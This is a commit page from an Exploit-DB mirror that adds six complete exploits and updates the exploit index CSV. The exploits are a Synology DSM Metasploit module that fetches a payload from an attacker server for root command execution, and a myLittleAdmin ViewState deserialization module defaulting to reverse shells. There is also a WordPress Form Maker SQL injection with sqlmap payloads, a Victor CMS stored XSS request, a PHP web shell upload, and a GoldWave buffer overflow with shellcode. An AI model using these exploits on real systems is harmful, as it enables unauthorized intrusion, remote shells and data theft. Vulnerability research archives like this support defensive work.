bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-05-26

Browse source 
6 changes to exploits/shellcodes

GoldWave - Buffer Overflow (SEH Unicode)
Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit)
Synology DiskStation Manager - smart.cgi Remote Command Execution (Metasploit)
Wordpress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated)
Victor CMS 1.0 - 'add_user' Persistent Cross-Site Scripting
Online Discussion Forum Site 1.0 - Remote Code Execution
This commit is contained in:
Offensive Security 2020-05-26 05:01:56 +00:00
parent 5308efc65c
commit 4fbd3630c8
7 changed files with 647 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

209
exploits/hardware/remote/48514.rb Executable file
View file

@ -0,0 +1,209 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::FileDropper
DEVICE_INFO_PATTERN = /major=(?<major>\d+)&minor=(?<minor>\d+)&build=(?<build>\d+)
&junior=\d+&unique=synology_\w+_(?<model>[^&]+)/x.freeze
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Synology DiskStation Manager smart.cgi Remote Command Execution',
'Description' => %q{
This module exploits a vulnerability found in Synology DiskStation Manager (DSM)
versions < 5.2-5967-5, which allows the execution of arbitrary commands under root
privileges after website authentication.
The vulnerability is located in webman/modules/StorageManager/smart.cgi, which
allows appending of a command to the device to be scanned. However, the command
with drive is limited to 30 characters. A somewhat valid drive name is required,
thus /dev/sd is used, even though it doesn't exist. To circumvent the character
restriction, a wget input file is staged in /a, and executed to download our payload
to /b. From there the payload is executed. A wfsdelay is required to give time
for the payload to download, and the execution of it to run.
},
'Author' =>
[
'Nigusu Kassahun', # Discovery
'h00die' # metasploit module
],
'References' =>
[
[ 'CVE', '2017-15889' ],
[ 'EDB', '43190' ],
[ 'URL', 'https://ssd-disclosure.com/ssd-advisory-synology-storagemanager-smart-cgi-remote-command-execution/' ],
[ 'URL', 'https://synology.com/en-global/security/advisory/Synology_SA_17_65_DSM' ]
],
'Privileged' => true,
'Stance' => Msf::Exploit::Stance::Aggressive,
'Platform' => ['python'],
'Arch' => [ARCH_PYTHON],
'Targets' =>
[
['Automatic', {}]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PrependMigrate' => true,
'WfsDelay' => 10
},
'License' => MSF_LICENSE,
'DisclosureDate' => 'Nov 08 2017'
)
)
register_options(
[
Opt::RPORT(5000),
OptString.new('TARGETURI', [true, 'The URI of the Synology Website', '/']),
OptString.new('USERNAME', [true, 'The Username for Synology', 'admin']),
OptString.new('PASSWORD', [true, 'The Password for Synology', ''])
]
)
register_advanced_options [
OptBool.new('ForceExploit', [false, 'Override check result', false])
]
end
def check
vprint_status('Trying to detect installed version')
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'webman', 'info.cgi'),
'vars_get' => { 'host' => '' }
})
if res && (res.code == 200) && res.body =~ DEVICE_INFO_PATTERN
version = "#{$LAST_MATCH_INFO[:major]}.#{$LAST_MATCH_INFO[:minor]}"
build = $LAST_MATCH_INFO[:build]
model = $LAST_MATCH_INFO[:model].sub(/^[a-z]+/) { |s| s[0].upcase }
model = "DS#{model}" unless model =~ /^[A-Z]/
else
vprint_error('Detection failed')
return CheckCode::Unknown
end
vprint_status("Model #{model} with version #{version}-#{build} detected")
case version
when '3.0', '4.0', '4.1', '4.2', '4.3', '5.0', '5.1'
return CheckCode::Appears
when '5.2'
return CheckCode::Appears if build < '5967-5'
end
CheckCode::Safe
end
def on_request_uri(cli, _request, cookie, token)
print_good('HTTP Server request received, sending payload')
send_response(cli, payload.encoded)
print_status('Executing payload')
inject_request(cookie, token, 'python b')
end
def inject_request(cookie, token, cmd = '')
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'webman', 'modules', 'StorageManager', 'smart.cgi'),
'cookie' => cookie,
'headers' => {
'X-SYNO-TOKEN' => token
},
'vars_post' => {
'action' => 'apply',
'operation' => 'quick',
'disk' => "/dev/sd`#{cmd}`"
}
})
end
def login
# If you try to debug login through the browser, you'll see that desktop.js calls
# ux-all.js to do an RSA encrypted login.
# Wowever in a stroke of luck Mrs. h00die caused
# a power sag while tracing/debugging the loging, causing the NAS to power off.
# when that happened, it failed to get the crypto vars, and defaulted to a
# non-encrypted login, which seems to work just fine. greetz Mrs. h00die!
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'webman', 'login.cgi'),
'vars_get' => { 'enable_syno_token' => 'yes' },
'vars_post' => {
'username' => datastore['USERNAME'],
'passwd' => datastore['PASSWORD'],
'OTPcode' => '',
'__cIpHeRtExT' => '',
'client_time' => Time.now.to_i,
'isIframeLogin' => 'yes'
}
})
if res && %r{<div id='synology'>(?<json>.*)</div>}m =~ res.body
result = JSON.parse(json)
fail_with(Failure::BadConfig, 'Incorrect Username/Password') if result['result'] == 'error'
if result['result'] == 'success'
return res.get_cookies, result['SynoToken']
end
fail_with(Failure::Unknown, "Unknown response: #{result}")
end
end
def exploit
unless check == CheckCode::Appears
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end
if datastore['SRVHOST'] == '0.0.0.0'
fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful')
end
begin
print_status('Attempting Login')
cookie, token = login
start_service({ 'Uri' => {
'Proc' => proc do |cli, req|
on_request_uri(cli, req, cookie, token)
end,
'Path' => '/'
} })
print_status('Cleaning env')
inject_request(cookie, token, cmd = 'rm -rf /a')
inject_request(cookie, token, cmd = 'rm -rf b')
command = "#{datastore['SRVHOST']}:#{datastore['SRVPORT']}".split(//)
command_space = 22 - "echo -n ''>>/a".length
command_space -= 1
command.each_slice(command_space) do |a|
a = a.join('')
vprint_status("Staging wget with: echo -n '#{a}'>>/a")
inject_request(cookie, token, cmd = "echo -n '#{a}'>>/a")
end
print_status('Requesting payload pull')
register_file_for_cleanup('/usr/syno/synoman/webman/modules/StorageManager/b')
register_file_for_cleanup('/a')
inject_request(cookie, token, cmd = 'wget -i /a -O b')
# at this point we let the HTTP server call the last stage
# wfsdelay should be long enough to hold out for everything to download and run
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
end

56
exploits/php/webapps/48509.txt Normal file
View file

@ -0,0 +1,56 @@
# Exploit Title: Wordpress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated)
# Exploit Author: SunCSR (Sun* Cyber Security Research)
# Date: 2020 - 5 - 22
# Vender Homepage: https://help.10web.io/
# Version: <= 5.4.1
# Tested on: Ubuntu 18.04
Description:
SQL injection in the Form Maker by 10Web WordPress Plugin before 5.4.1
exists via the /wordpress/wp-admin/admin.php?page=blocked_ips_fm&s=1" s
parameter.
Poc:
GET /wordpress/wp-admin/admin.php?page=blocked_ips_fm&s=1" HTTP/1.1
Host: test-wp.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101
Firefox/76.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie:
wordpress_a1c6f59e10f34b6016913b2f9ff0346f=admin%7C1590313373%7CtioKZPEQ9lGWkoMcKGK2qjTp8kepuU9cqticECRXZ79%7C96d43f4ee5cf009365c9722f461d538f96a62637094759cb6fb7a9f54edac171;
wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_a1c6f59e10f34b6016913b2f9ff0346f=admin%7C1590313373%7CtioKZPEQ9lGWkoMcKGK2qjTp8kepuU9cqticECRXZ79%7C9a63283d84855ed6eeae8e4b5f3a405fba003ddd15748bf5cdca5caaca228a19;
wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1590140574;
PHPSESSID=5bpdr8tbj5furvccoadjjj2sgb
Upgrade-Insecure-Requests: 1
SQLMap using:
sqlmap -u '
http://test-wp.com:80/wordpress/wp-admin/admin.php?page=blocked_ips_fm&s=123'
--cookie='wordpress_a1c6f59e10f34b6016913b2f9ff0346f=admin%7C1590313373%7CtioKZPEQ9lGWkoMcKGK2qjTp8kepuU9cqticECRXZ79%7C96d43f4ee5cf009365c9722f461d538f96a62637094759cb6fb7a9f54edac171;wordpress_test_cookie=WP+Cookie+check;wordpress_logged_in_a1c6f59e10f34b6016913b2f9ff0346f=admin%7C1590313373%7CtioKZPEQ9lGWkoMcKGK2qjTp8kepuU9cqticECRXZ79%7C9a63283d84855ed6eeae8e4b5f3a405fba003ddd15748bf5cdca5caaca228a19;wp-settings-1=libraryContent%3Dbrowse;wp-settings-time-1=1590140574;PHPSESSID=5bpdr8tbj5furvccoadjjj2sgb'
Parameter: s (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: page=blocked_ips_fm&s=-1027" OR 8913=8913#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
Payload: page=blocked_ips_fm&s=123" AND (SELECT 2867 FROM(SELECT
COUNT(*),CONCAT(0x717a707871,(SELECT
(ELT(2867=2867,1))),0x71787a7671,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- TxQH
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: page=blocked_ips_fm&s=123" AND SLEEP(5)-- oPEC
---
[17:20:17] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0

66
exploits/php/webapps/48511.txt Normal file
View file

@ -0,0 +1,66 @@
# Exploit Title: Victor CMS 1.0 - 'add_user' Persistent Cross-Site Scripting
# Google Dork: N/A
# Date: 2020-05-23
# Exploit Author: Nitya Nand
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Version: 1.0
# Tested on: Linux
# CVE : N/A
Description: The POST parameter 'user_name', 'user_firstname', 'user_lastname' is vulnerable to persistent cross site scripting Payload: <script>alert(1)</script>
POST /phpmaster/admin/users.php?source=add_user HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/phpmaster/admin/users.php?source=add_user
Content-Type: multipart/form-data; boundary=---------------------------515906178311115682892435428
Content-Length: 417375
Connection: close
Cookie: PHPSESSID=8810e038f92cd7c711ee8b95db1dcacb
Upgrade-Insecure-Requests: 1
-----------------------------515906178311115682892435428
Content-Disposition: form-data; name="user_name"
"><script>alert(1)</script>
-----------------------------515906178311115682892435428
Content-Disposition: form-data; name="user_firstname"
"><script>alert(2)</script>
-----------------------------515906178311115682892435428
Content-Disposition: form-data; name="user_lastname"
"><script>alert(3)</script>
-----------------------------515906178311115682892435428
Content-Disposition: form-data; name="user_image"; filename="9400.jpg"
Content-Type: image/jpeg
-----------------------------515906178311115682892435428
Content-Disposition: form-data; name="user_role"
User
-----------------------------515906178311115682892435428
Content-Disposition: form-data; name="user_email"
abc@gmail.com
-----------------------------515906178311115682892435428
Content-Disposition: form-data; name="user_password"
1234
-----------------------------515906178311115682892435428
Content-Disposition: form-data; name="create_user"
Add User
-----------------------------515906178311115682892435428--

21
exploits/php/webapps/48512.txt Normal file
View file

@ -0,0 +1,21 @@
# Exploit Title: Online Discussion Forum Site 1.0 - Remote Code Execution
# Google Dork: N/A
# Date: 2020-05-24
# Exploit Author: Selim Enes 'Enesdex' Karaduman
# Vendor Homepage: https://www.sourcecodester.com/php/14233/online-discussion-forum-site.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14233&title=Online+Discussion+Forum+Site
# Version: 1.0 (REQUIRED)
# Tested on: Windows 10 / Wamp Server
# CVE : N/A
Go to http://localhost/Online%20Discussion%20Forum%20Site/register.php register page to sign up
Then fill other fields and upload the shell.php with following PHP-shell-code
<?php
$command = shell_exec($_REQUEST['cmd']);
echo $command;
?>
After the registration process is completed go to the following page and execute the os command via uploaded shell
http://localhost/Online%20Discussion%20Forum%20Site/ups/shell.php?cmd=$THECODE-YOU-WANT-TO-EXECUTE
Any unauthenticated attacker is able to execute arbitrary os command

80
exploits/windows/local/48510.py Executable file
View file

@ -0,0 +1,80 @@
# Exploit Title: GoldWave 5.70 Buffer Overflow (SEH Unicode)
# Date: 2020-05-14
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.goldwave.com/
# Version: 5.70
# Download Link: http://goldwave.com//downloads/gwave570.exe
# Tested on: Windows 10 x86
# PoC
# 1. generate crash.txt, copy contents to clipboard
# 2. open gold wave app
# 3. select File, Open URL...
# 4. paste contents from clipboard after 'http://'
# 5. select OK
f = open("crash.txt", "wb")
buf = b""
buf += b"\x41" * 1019
buf += b"\x71\x71" # Unicode NOP
buf += b"\xB3\x48" # 0x004800b3 | pop ecx, pop ebp, ret
#realigning stack
buf += b"\x75" # Unicode NOP
buf += b"\x54" # Push ESP
buf += b"\x75" # Unicode NOP
buf += b"\x58" # POP EAX
buf += b"\x75" # Unicode NOP
buf += b"\x05\xFF\x10" # ADD EAX,
buf += b"\x75" # Unicode NOP
buf += b"\x2d\xEA\x10" # SUB EAX,
buf += b"\x75"
buf += b"\x71" * 595
#msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_upper
BufferRegister=EAX -f python
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51"
buf += b"\x41\x54\x41\x58\x41\x5a\x41\x50\x55\x33\x51\x41\x44"
buf += b"\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41"
buf += b"\x51\x41\x49\x41\x51\x41\x50\x41\x35\x41\x41\x41\x50"
buf += b"\x41\x5a\x31\x41\x49\x31\x41\x49\x41\x49\x41\x4a\x31"
buf += b"\x31\x41\x49\x41\x49\x41\x58\x41\x35\x38\x41\x41\x50"
buf += b"\x41\x5a\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49"
buf += b"\x41\x49\x51\x49\x31\x31\x31\x31\x41\x49\x41\x4a\x51"
buf += b"\x49\x31\x41\x59\x41\x5a\x42\x41\x42\x41\x42\x41\x42"
buf += b"\x41\x42\x33\x30\x41\x50\x42\x39\x34\x34\x4a\x42\x4b"
buf += b"\x4c\x59\x58\x35\x32\x4b\x50\x4b\x50\x4d\x30\x31\x50"
buf += b"\x43\x59\x4b\x35\x50\x31\x39\x30\x42\x44\x54\x4b\x50"
buf += b"\x50\x30\x30\x54\x4b\x42\x32\x4c\x4c\x54\x4b\x31\x42"
buf += b"\x4c\x54\x54\x4b\x34\x32\x4f\x38\x4c\x4f\x48\x37\x50"
buf += b"\x4a\x4f\x36\x50\x31\x4b\x4f\x36\x4c\x4f\x4c\x31\x51"
buf += b"\x43\x4c\x4c\x42\x4e\x4c\x4f\x30\x39\x31\x38\x4f\x4c"
buf += b"\x4d\x4d\x31\x59\x37\x4a\x42\x4a\x52\x42\x32\x51\x47"
buf += b"\x34\x4b\x50\x52\x4c\x50\x34\x4b\x30\x4a\x4f\x4c\x54"
buf += b"\x4b\x30\x4c\x4e\x31\x34\x38\x4b\x33\x30\x48\x4b\x51"
buf += b"\x4a\x31\x30\x51\x54\x4b\x50\x59\x4d\x50\x4d\x31\x5a"
buf += b"\x33\x44\x4b\x31\x39\x4c\x58\x39\x53\x4e\x5a\x30\x49"
buf += b"\x44\x4b\x4e\x54\x34\x4b\x4d\x31\x4a\x36\x4e\x51\x4b"
buf += b"\x4f\x36\x4c\x59\x31\x38\x4f\x4c\x4d\x4b\x51\x49\x37"
buf += b"\x4e\x58\x4b\x30\x52\x55\x4b\x46\x4c\x43\x43\x4d\x4c"
buf += b"\x38\x4f\x4b\x43\x4d\x4e\x44\x42\x55\x5a\x44\x30\x58"
buf += b"\x54\x4b\x52\x38\x4e\x44\x4b\x51\x59\x43\x31\x56\x34"
buf += b"\x4b\x4c\x4c\x50\x4b\x34\x4b\x50\x58\x4d\x4c\x4b\x51"
buf += b"\x39\x43\x44\x4b\x4d\x34\x44\x4b\x4b\x51\x4a\x30\x35"
buf += b"\x39\x30\x44\x4d\x54\x4d\x54\x31\x4b\x51\x4b\x53\x31"
buf += b"\x50\x59\x50\x5a\x32\x31\x4b\x4f\x49\x50\x31\x4f\x31"
buf += b"\x4f\x31\x4a\x34\x4b\x4e\x32\x4a\x4b\x54\x4d\x51\x4d"
buf += b"\x51\x5a\x4b\x51\x54\x4d\x54\x45\x46\x52\x4b\x50\x4d"
buf += b"\x30\x4b\x50\x32\x30\x33\x38\x4e\x51\x34\x4b\x42\x4f"
buf += b"\x34\x47\x4b\x4f\x49\x45\x57\x4b\x5a\x50\x38\x35\x45"
buf += b"\x52\x52\x36\x42\x48\x37\x36\x34\x55\x47\x4d\x55\x4d"
buf += b"\x4b\x4f\x4a\x35\x4f\x4c\x4c\x46\x33\x4c\x4c\x4a\x43"
buf += b"\x50\x4b\x4b\x39\x50\x33\x45\x4d\x35\x47\x4b\x50\x47"
buf += b"\x4e\x33\x42\x52\x42\x4f\x31\x5a\x4b\x50\x50\x53\x4b"
buf += b"\x4f\x49\x45\x52\x43\x53\x31\x42\x4c\x53\x33\x4e\x4e"
buf += b"\x32\x45\x34\x38\x53\x35\x4b\x50\x41\x41"
buf += b"\x44" * (5000 - len(buf))
f.write(buf)
f.close()

209
exploits/windows/remote/48513.rb Executable file
View file

@ -0,0 +1,209 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
# <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
VIEWSTATE_GENERATOR = 'CA0B0334'.freeze
# <machineKey
# validationKey="5C7EEF6650639D2CB8FAA0DA36AF24452DCF69065F2EDC2C8F2F44C0220BE2E5889CA01A207FC5FCE62D1A5A4F6D2410722261E6A33E77E0628B17AA928039BF"
# decryptionKey="DC47E74EA278F789D2FF0E412AD840A89C10171F408D8AC4"
# validation="SHA1" />
VIEWSTATE_VALIDATION_KEY =
"\x5c\x7e\xef\x66\x50\x63\x9d\x2c\xb8\xfa\xa0\xda\x36\xaf\x24\x45\x2d\xcf" \
"\x69\x06\x5f\x2e\xdc\x2c\x8f\x2f\x44\xc0\x22\x0b\xe2\xe5\x88\x9c\xa0\x1a" \
"\x20\x7f\xc5\xfc\xe6\x2d\x1a\x5a\x4f\x6d\x24\x10\x72\x22\x61\xe6\xa3\x3e" \
"\x77\xe0\x62\x8b\x17\xaa\x92\x80\x39\xbf".freeze
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::ViewState
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Plesk/myLittleAdmin ViewState .NET Deserialization',
'Description' => %q{
This module exploits a ViewState .NET deserialization vulnerability in
web-based MS SQL Server management tool myLittleAdmin, for version 3.8
and likely older versions, due to hardcoded <machineKey> parameters in
the web.config file for ASP.NET.
Popular web hosting control panel Plesk offers myLittleAdmin as an
optional component that is selected automatically during "full"
installation. This exploit caters to the Plesk target, though it
should work fine against a standalone myLittleAdmin setup.
Successful exploitation results in code execution as the user running
myLittleAdmin, which is IUSRPLESK_sqladmin for Plesk and described as
the "SQL Admin MSSQL anonymous account."
Tested on the latest Plesk Obsidian with optional myLittleAdmin 3.8.
},
'Author' => [
# Reported to SSD (SecuriTeam) by an anonymous researcher
# Publicly disclosed by Noam Rathaus of SSD (SecuriTeam)
'Spencer McIntyre', # Inspiration
'wvu' # Module
],
'References' => [
['CVE', '2020-13166'],
['URL', 'https://ssd-disclosure.com/ssd-advisory-mylittleadmin-preauth-rce/'],
['URL', 'https://portswigger.net/daily-swig/mylittleadmin-has-a-big-unpatched-security-flaw']
],
'DisclosureDate' => '2020-05-15', # SSD (SecuriTeam) advisory
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Privileged' => false,
'Targets' => [
[
'Windows Command',
'Arch' => ARCH_CMD,
'Type' => :win_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
}
],
[
'Windows Dropper',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :win_dropper,
'CmdStagerFlavor' => %i[psh_invokewebrequest certutil vbs],
'DefaultOptions' => {
'CMDSTAGER::FLAVOR' => :psh_invokewebrequest,
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
}
],
[
'PowerShell Stager',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :psh_stager,
'DefaultOptions' => {
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
}
]
],
'DefaultTarget' => 2,
'DefaultOptions' => {
'SSL' => true,
'WfsDelay' => 10 # First exploit attempt may be a little slow
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
register_options([
Opt::RPORT(8401, true, 'The myLittleAdmin port (default for Plesk!)'),
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
# XXX: https://github.com/rapid7/metasploit-framework/issues/12963
import_target_defaults
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
)
unless res
return CheckCode::Unknown('Target did not respond to check request.')
end
unless res.code == 200 && res.body.include?('myLittleAdmin for SQL Server')
return CheckCode::Unknown('Target is not running myLittleAdmin.')
end
vprint_good("myLittleAdmin is running at #{full_uri}")
check_viewstate(res.get_html_document)
end
def check_viewstate(html)
viewstate = html.at('//input[@id = "__VIEWSTATE"]/@value')&.text
unless viewstate
return CheckCode::Detected("__VIEWSTATE not found, can't complete check.")
end
@viewstate_generator =
html.at('//input[@id = "__VIEWSTATEGENERATOR"]/@value')&.text
unless @viewstate_generator
print_warning('__VIEWSTATEGENERATOR not found, using known default value')
@viewstate_generator = VIEWSTATE_GENERATOR
end
# ViewState generator needs to be a packed integer now
@viewstate_generator = [@viewstate_generator.to_i(16)].pack('V')
we_can_sign_viewstate = can_sign_viewstate?(
viewstate,
extra: @viewstate_generator,
key: VIEWSTATE_VALIDATION_KEY
)
if we_can_sign_viewstate
return CheckCode::Vulnerable('We can sign our own ViewState.')
end
CheckCode::Safe("We can't sign our own ViewState.")
end
def exploit
# NOTE: Automatic check is implemented by the AutoCheck mixin
super
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
case target['Type']
when :win_cmd
execute_command(payload.encoded)
when :win_dropper
execute_cmdstager
when :psh_stager
execute_command(cmd_psh_payload(
payload.encoded,
payload.arch.first,
remove_comspec: true
))
end
end
def execute_command(cmd, _opts = {})
vprint_status("Serializing command: #{cmd}")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'vars_post' => {
# This is the only parameter we need for successful exploitation!
'__VIEWSTATE' => generate_viewstate_payload(
cmd,
extra: @viewstate_generator,
key: VIEWSTATE_VALIDATION_KEY
)
}
)
unless res && res.code == 302 && res.redirection.path == '/error/index.html'
fail_with(Failure::PayloadFailed, "Could not execute command: #{cmd}")
end
print_good("Successfully executed command: #{cmd}")
end
end

6
files_exploits.csv
View file

@ -11081,6 +11081,7 @@ id,file,description,date,author,type,platform,port
48499,exploits/windows/local/48499.txt,"CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)",2020-05-21,"Xenofon Vassilakopoulos",local,windows,
48505,exploits/windows/local/48505.txt,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation",2020-05-22,"Matteo Malvica",local,windows,
48507,exploits/windows/local/48507.py,"VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP_ASLR)",2020-05-22,Gobinathan,local,windows,
48510,exploits/windows/local/48510.py,"GoldWave - Buffer Overflow (SEH Unicode)",2020-05-25,"Andy Bowden",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -18157,6 +18158,8 @@ id,file,description,date,author,type,platform,port
48483,exploits/multiple/remote/48483.txt,"HP LinuxKI 6.01 - Remote Command Injection",2020-05-18,"Cody Winkler",remote,multiple,
48491,exploits/php/remote/48491.rb,"Pi-Hole - heisenbergCompensator Blocklist OS Command Execution (Metasploit)",2020-05-19,Metasploit,remote,php,
48508,exploits/multiple/remote/48508.rb,"WebLogic Server - Deserialization RCE - BadAttributeValueExpException (Metasploit)",2020-05-22,Metasploit,remote,multiple,
48513,exploits/windows/remote/48513.rb,"Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit)",2020-05-25,Metasploit,remote,windows,
48514,exploits/hardware/remote/48514.rb,"Synology DiskStation Manager - smart.cgi Remote Command Execution (Metasploit)",2020-05-25,Metasploit,remote,hardware,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -42736,3 +42739,6 @@ id,file,description,date,author,type,platform,port
48500,exploits/multiple/webapps/48500.txt,"OpenEDX platform Ironwood 2.5 - Remote Code Execution",2020-05-21,"Daniel Monzón",webapps,multiple,
48504,exploits/php/webapps/48504.txt,"Dolibarr 11.0.3 - Persistent Cross-Site Scripting",2020-05-22,"Mehmet Kelepçe",webapps,php,
48506,exploits/php/webapps/48506.py,"Gym Management System 1.0 - Unauthenticated Remote Code Execution",2020-05-22,boku,webapps,php,
48509,exploits/php/webapps/48509.txt,"Wordpress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated)",2020-05-25,SunCSR,webapps,php,
48511,exploits/php/webapps/48511.txt,"Victor CMS 1.0 - 'add_user' Persistent Cross-Site Scripting",2020-05-25,"Nitya Nand",webapps,php,
48512,exploits/php/webapps/48512.txt,"Online Discussion Forum Site 1.0 - Remote Code Execution",2020-05-25,Enesdex,webapps,php,

Can't render this file because it is too large.